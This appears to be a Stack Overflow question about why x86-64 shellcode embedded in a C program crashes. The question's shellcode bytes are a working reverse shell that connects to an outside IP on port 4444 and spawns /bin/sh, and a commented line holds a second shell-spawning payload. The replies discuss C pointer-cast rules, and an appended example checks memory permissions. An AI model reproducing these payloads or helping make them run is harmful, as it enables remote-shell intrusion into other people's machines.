Shellcode working, but not in a custom C program
My payload asm works, but I tried to embed it in my own C program. It works: it connects to my nc port 4444, then breaks the connection. I don't know why this happens, since I tested this example in my asm executable and it works perfectly, but in my C program it does not. What can I do? How can I debug it?
#include <stdio.h>
unsigned char random[] = "0E249hvzColk1lZ4Vk1eccJM07x2FuitUVsliNPA5FybQn-Ny7DQJ0t-JCvDnm-mZY8YkyOtj6xgN1AUKzcBtr9rRCdGlZCjNnOKGbMzfpQQUampvZsqE0MRDhcvyvpOWzqZG5QJGBuL4-u0MipHq1ioOyNdcWcsRF0zPBd7iI76tTK5CPeDhklfSNQKaw50tsA1lEXDl7mVcvre9b6I-cUR1hYg2oLC6W0zwznvIizbea21OOB9oke5hYdWSSmI181bwvP6IuR20HIu1rGjKgnjHbClcMt9DWBOHBrtxSVUddgparNs5mR3lK3AtY85DN9W2ikX0lOSZbgcB47KC-wSGYRWOuqj1G8ebqUIArlnGk1TBKdwmezfz7RXHsa0EBlFRz60H9lDyQjJb31e78Ff1xXsFEJ5mnkU9rL5NDxPxyOkqxQoO1-6iR62feGLvQdUKfqXF2G0X8NMYqx0UWa78ezsOGsqdnwU5ktwMm2jaPZ5F1G8GKJFYGr7SXz6";
//\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05 64 bits shell
unsigned char shellcode[] = "\x68\xac\x14\x0a\x02\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
int main(void){
((void (*)())shellcode)();
}
./custom
Segmentation fault (core dumped)
c payload shellcode
asked Nov 8 at 4:49
m4st3rRul3z
I am so not going to run and debug your hellcode.
– Antti Haapala
Nov 8 at 6:25
1 Answer
You are trying to convert an object pointer shellcode to a function pointer in the following statement:
((void (*)())shellcode)();
This can lead to undefined behaviour.
The C99 standard states this in the section on function pointers:
Even with an explicit cast, it is invalid to convert a function pointer to an object pointer or a pointer to void, or vice versa.
You can see this when you compile your code with the -pedantic-errors option in GCC, which gives the following error:
<source>: In function 'main':
<source>:11:6: error: ISO C forbids conversion of object pointer to function pointer type [-Wpedantic]
See live demo here.
answered Nov 8 at 5:04
P.W
How can I fix it?
– m4st3rRul3z
Nov 8 at 5:11
You need to find a compiler which supports this as an extension and use it to compile your code.
– P.W
Nov 8 at 5:19
How can I fix the main part for it?
– m4st3rRul3z
Nov 8 at 5:30
@P.W that is not an explanation. It should work on GCC as such...
– Antti Haapala
Nov 8 at 6:24
@AnttiHaapala: Yes, GCC supports it. We do not know what compiler OP is using. So in the comments, I asked him to use a compiler that supports this as an extension.
– P.W
Nov 8 at 6:29
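On the question's "how can I debug it?": one check on Linux is whether the address being called lies in an executable mapping, since a default build maps global data rw- and code r-x. The following is an added example, not code from the question or the answer; it reads /proc/self/maps and reports the permissions for a data array and for a function, and the names sample_buf and mapping_is_executable are hypothetical.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed placeholder bytes standing in for a global byte array;
   they are only located in memory, never executed. */
unsigned char sample_buf[] = { 0x00, 0x01, 0x02, 0x03 };

/* Find the mapping that contains addr in /proc/self/maps (Linux only).
   Copies the 4-character permission field (e.g. "rw-p") into perms.
   Returns 1 if the mapping is executable, 0 if not, -1 if not found. */
int mapping_is_executable(uintptr_t addr, char perms[5])
{
    FILE *f = fopen("/proc/self/maps", "r");
    char line[512];
    int result = -1;

    if (f == NULL)
        return -1;
    while (fgets(line, sizeof line, f) != NULL) {
        uint64_t start, end;
        char p[5];
        /* Line format: start-end perms offset dev inode [path] */
        if (sscanf(line, "%" SCNx64 "-%" SCNx64 " %4s", &start, &end, p) != 3)
            continue;
        if (addr >= start && addr < end) {
            snprintf(perms, 5, "%s", p);
            result = (p[2] == 'x');
            break;
        }
    }
    fclose(f);
    return result;
}

int main(void)
{
    char perms[5] = "";
    /* Pointer-to-integer conversion is defined for any pointer type, so no
       object/function pointer cast is needed to inspect either address. */
    int data_x = mapping_is_executable((uintptr_t)sample_buf, perms);
    printf("sample_buf: %s executable=%d\n", perms, data_x);
    int code_x = mapping_is_executable((uintptr_t)main, perms);
    printf("main:       %s executable=%d\n", perms, code_x);
    return 0;
}
```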